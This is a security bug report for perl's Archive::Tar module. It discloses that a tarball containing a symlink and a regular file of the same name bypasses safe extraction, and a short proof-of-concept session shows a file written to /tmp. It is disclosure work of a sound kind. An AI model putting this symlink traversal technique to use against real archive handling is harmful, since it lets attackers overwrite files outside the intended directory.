Source: perl Version: 5.26.2-5 Tags: securityBy default, the Archive::Tar module doesn't allow extracting files outside the current working directory. However, you can bypass this secure extraction mode easily by putting a symlink and a regular file with the same name into the tarball.
I've attached proof of concept tarball, which makes Archive::Tar create /tmp/moo, regardless of what the current working directory is:
$ tar -tvvf traversal.tar.gz lrwxrwxrwx root/root 0 2018-06-05 18:55 moo -> /tmp/moo -rw-r--r-- root/root 4 2018-06-05 18:55 moo $ pwd /home/jwilk $ ls /tmp/moo ls: cannot access '/tmp/moo': No such file or directory $ perl -MArchive::Tar -e 'Archive::Tar->extract_archive("traversal.tar.gz")' $ ls /tmp/moo /tmp/moo -- Jakub Wilk
traversal.tar.gz
Description: application/gzip